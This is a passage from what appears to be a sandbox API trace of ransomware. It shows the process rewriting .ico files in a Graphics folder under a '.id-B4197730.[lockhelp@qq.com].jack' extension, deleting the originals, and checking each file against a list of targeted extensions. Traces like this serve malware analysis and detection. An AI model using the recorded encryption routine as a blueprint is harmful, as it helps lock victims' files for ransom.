lpString2=".dll") returned 1 [0197.380] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.380] lstrlenW (lpString="Print.ico") returned 9 [0197.380] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0197.394] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=1150) returned 1 [0197.394] CloseHandle (hObject=0x40c) returned 1 [0197.394] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico")) returned 0x80 [0197.394] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.395] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.395] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.395] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.395] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.397] GetLastError () returned 0x0 [0197.397] ReadFile (in: hFile=0x41c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x47e, lpOverlapped=0x0) returned 1 [0197.408] WriteFile (in: hFile=0x420, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x480, lpOverlapped=0x0) returned 1 [0197.409] ReadFile (in: hFile=0x41c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.409] WriteFile (in: hFile=0x420, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xe6, lpOverlapped=0x0) returned 1 [0197.409] SetEndOfFile (hFile=0x420) returned 1 [0197.409] CloseHandle (hObject=0x420) returned 1 [0197.410] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.410] SetEndOfFile (hFile=0x41c) returned 1 [0197.411] CloseHandle (hObject=0x41c) returned 1 [0197.411] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.411] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico")) returned 1 [0197.411] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.411] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.411] lstrlenW (lpString=".doc") returned 4 [0197.411] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.411] lstrlenW (lpString=".docx") returned 5 [0197.411] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0197.411] lstrlenW (lpString=".pdf") returned 4 [0197.412] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.412] lstrlenW (lpString=".xls") returned 4 [0197.412] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.412] lstrlenW (lpString=".xlsx") returned 5 [0197.412] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0197.412] lstrlenW (lpString=".ppt") returned 4 [0197.412] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.412] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.412] lstrlenW (lpString=".zip") returned 4 [0197.412] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.412] lstrlenW (lpString=".rar") returned 4 [0197.412] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.412] lstrlenW (lpString=".bz2") returned 4 [0197.412] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.412] lstrlenW (lpString=".7z") returned 3 [0197.412] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.412] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.412] lstrlenW (lpString=".dbf") returned 4 [0197.412] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.412] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.412] lstrlenW (lpString=".1cd") returned 4 [0197.412] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.412] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.412] lstrlenW (lpString=".jpg") returned 4 [0197.412] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.412] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.412] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.412] lstrlenW (lpString=".doc") returned 4 [0197.412] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.413] lstrlenW (lpString=".docx") returned 5 [0197.413] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0197.413] lstrlenW (lpString=".pdf") returned 4 [0197.413] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.413] lstrlenW (lpString=".xls") returned 4 [0197.413] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.413] lstrlenW (lpString=".xlsx") returned 5 [0197.413] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0197.413] lstrlenW (lpString=".ppt") returned 4 [0197.413] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.413] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.413] lstrlenW (lpString=".zip") returned 4 [0197.413] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.413] lstrlenW (lpString=".rar") returned 4 [0197.413] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.413] lstrlenW (lpString=".bz2") returned 4 [0197.413] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.413] lstrlenW (lpString=".7z") returned 3 [0197.413] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.413] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.413] lstrlenW (lpString=".dbf") returned 4 [0197.413] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.413] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.413] lstrlenW (lpString=".1cd") returned 4 [0197.413] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.413] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0197.413] lstrlenW (lpString=".jpg") returned 4 [0197.413] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.414] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.414] lstrlenW (lpString="Rotate3.ico") returned 11 [0197.414] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.414] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=894) returned 1 [0197.414] CloseHandle (hObject=0x41c) returned 1 [0197.414] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico")) returned 0x80 [0197.414] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.414] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0197.414] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.414] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.415] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.415] GetLastError () returned 0x0 [0197.415] ReadFile (in: hFile=0x41c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x37e, lpOverlapped=0x0) returned 1 [0197.432] WriteFile (in: hFile=0x420, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x380, lpOverlapped=0x0) returned 1 [0197.433] ReadFile (in: hFile=0x41c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.434] WriteFile (in: hFile=0x420, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xea, lpOverlapped=0x0) returned 1 [0197.434] SetEndOfFile (hFile=0x420) returned 1 [0197.434] CloseHandle (hObject=0x420) returned 1 [0197.435] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.435] SetEndOfFile (hFile=0x41c) returned 1 [0197.436] CloseHandle (hObject=0x41c) returned 1 [0197.436] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.436] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico")) returned 1 [0197.436] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.436] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.436] lstrlenW (lpString=".doc") returned 4 [0197.437] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.437] lstrlenW (lpString=".docx") returned 5 [0197.437] lstrcmpiW (lpString1=".docx", lpString2="3.ico") returned -1 [0197.437] lstrlenW (lpString=".pdf") returned 4 [0197.437] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.437] lstrlenW (lpString=".xls") returned 4 [0197.437] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.437] lstrlenW (lpString=".xlsx") returned 5 [0197.437] lstrcmpiW (lpString1=".xlsx", lpString2="3.ico") returned -1 [0197.437] lstrlenW (lpString=".ppt") returned 4 [0197.437] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.437] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.437] lstrlenW (lpString=".zip") returned 4 [0197.437] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.437] lstrlenW (lpString=".rar") returned 4 [0197.437] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.437] lstrlenW (lpString=".bz2") returned 4 [0197.437] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.437] lstrlenW (lpString=".7z") returned 3 [0197.437] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.437] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.437] lstrlenW (lpString=".dbf") returned 4 [0197.437] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.437] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.437] lstrlenW (lpString=".1cd") returned 4 [0197.437] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.437] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.437] lstrlenW (lpString=".jpg") returned 4 [0197.437] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.438] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.438] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.438] lstrlenW (lpString=".doc") returned 4 [0197.438] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.438] lstrlenW (lpString=".docx") returned 5 [0197.438] lstrcmpiW (lpString1=".docx", lpString2="3.ico") returned -1 [0197.438] lstrlenW (lpString=".pdf") returned 4 [0197.438] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.438] lstrlenW (lpString=".xls") returned 4 [0197.438] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.438] lstrlenW (lpString=".xlsx") returned 5 [0197.438] lstrcmpiW (lpString1=".xlsx", lpString2="3.ico") returned -1 [0197.438] lstrlenW (lpString=".ppt") returned 4 [0197.438] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.438] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.438] lstrlenW (lpString=".zip") returned 4 [0197.438] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.438] lstrlenW (lpString=".rar") returned 4 [0197.438] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.438] lstrlenW (lpString=".bz2") returned 4 [0197.438] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.438] lstrlenW (lpString=".7z") returned 3 [0197.438] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.438] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.438] lstrlenW (lpString=".dbf") returned 4 [0197.438] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.438] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.438] lstrlenW (lpString=".1cd") returned 4 [0197.438] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.439] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 42 [0197.439] lstrlenW (lpString=".jpg") returned 4 [0197.439] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.439] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.439] lstrlenW (lpString="Rotate4.ico") returned 11 [0197.439] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0197.468] GetFileSizeEx (in: hFile=0x418, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=894) returned 1 [0197.468] CloseHandle (hObject=0x418) returned 1 [0197.468] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico")) returned 0x80 [0197.468] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.468] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0197.468] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.468] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.468] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0197.468] GetLastError () returned 0x0 [0197.468] ReadFile (in: hFile=0x418, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x37e, lpOverlapped=0x0) returned 1 [0197.501] WriteFile (in: hFile=0x424, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x380, lpOverlapped=0x0) returned 1 [0197.501] ReadFile (in: hFile=0x418, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.502] WriteFile (in: hFile=0x424, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xea, lpOverlapped=0x0) returned 1 [0197.502] SetEndOfFile (hFile=0x424) returned 1 [0197.502] CloseHandle (hObject=0x424) returned 1 [0197.502] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.503] SetEndOfFile (hFile=0x418) returned 1 [0197.503] CloseHandle (hObject=0x418) returned 1 [0197.504] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.504] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico")) returned 1 [0197.504] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.504] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.504] lstrlenW (lpString=".doc") returned 4 [0197.504] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.504] lstrlenW (lpString=".docx") returned 5 [0197.504] lstrcmpiW (lpString1=".docx", lpString2="4.ico") returned -1 [0197.504] lstrlenW (lpString=".pdf") returned 4 [0197.504] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.504] lstrlenW (lpString=".xls") returned 4 [0197.504] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.504] lstrlenW (lpString=".xlsx") returned 5 [0197.505] lstrcmpiW (lpString1=".xlsx", lpString2="4.ico") returned -1 [0197.505] lstrlenW (lpString=".ppt") returned 4 [0197.505] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.505] lstrlenW (lpString=".zip") returned 4 [0197.505] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.505] lstrlenW (lpString=".rar") returned 4 [0197.505] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.505] lstrlenW (lpString=".bz2") returned 4 [0197.505] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.505] lstrlenW (lpString=".7z") returned 3 [0197.505] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.505] lstrlenW (lpString=".dbf") returned 4 [0197.505] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.505] lstrlenW (lpString=".1cd") returned 4 [0197.505] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.505] lstrlenW (lpString=".jpg") returned 4 [0197.505] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.505] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.505] lstrlenW (lpString=".doc") returned 4 [0197.505] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0197.505] lstrlenW (lpString=".docx") returned 5 [0197.505] lstrcmpiW (lpString1=".docx", lpString2="4.ico") returned -1 [0197.505] lstrlenW (lpString=".pdf") returned 4 [0197.506] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0197.506] lstrlenW (lpString=".xls") returned 4 [0197.506] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0197.506] lstrlenW (lpString=".xlsx") returned 5 [0197.506] lstrcmpiW (lpString1=".xlsx", lpString2="4.ico") returned -1 [0197.506] lstrlenW (lpString=".ppt") returned 4 [0197.506] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0197.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.506] lstrlenW (lpString=".zip") returned 4 [0197.506] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0197.506] lstrlenW (lpString=".rar") returned 4 [0197.506] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0197.506] lstrlenW (lpString=".bz2") returned 4 [0197.506] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0197.506] lstrlenW (lpString=".7z") returned 3 [0197.506] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0197.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.506] lstrlenW (lpString=".dbf") returned 4 [0197.506] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0197.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.506] lstrlenW (lpString=".1cd") returned 4 [0197.506] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0197.506] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0197.506] lstrlenW (lpString=".jpg") returned 4 [0197.506] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0197.507] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.507] lstrlenW (lpString="Rotate7.ico") returned 11 [0197.507] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0197.507] GetFileSizeEx (in: hFile=0x418, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=894) returned 1 [0197.507] CloseHandle (hObject=0x418) returned 1 [0197.507] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico")) returned 0x80 [0197.507] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.507] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0197.507] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.507] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.507] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0197.508] GetLastError () returned 0x0 [0197.508] ReadFile (in: hFile=0x418, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x37e, lpOverlapped=0x0) returned 1 [0197.915] WriteFile (in: hFile=0x424, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x380, lpOverlapped=0x0) returned 1 [0197.916] ReadFile (in: hFile=0x418, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, 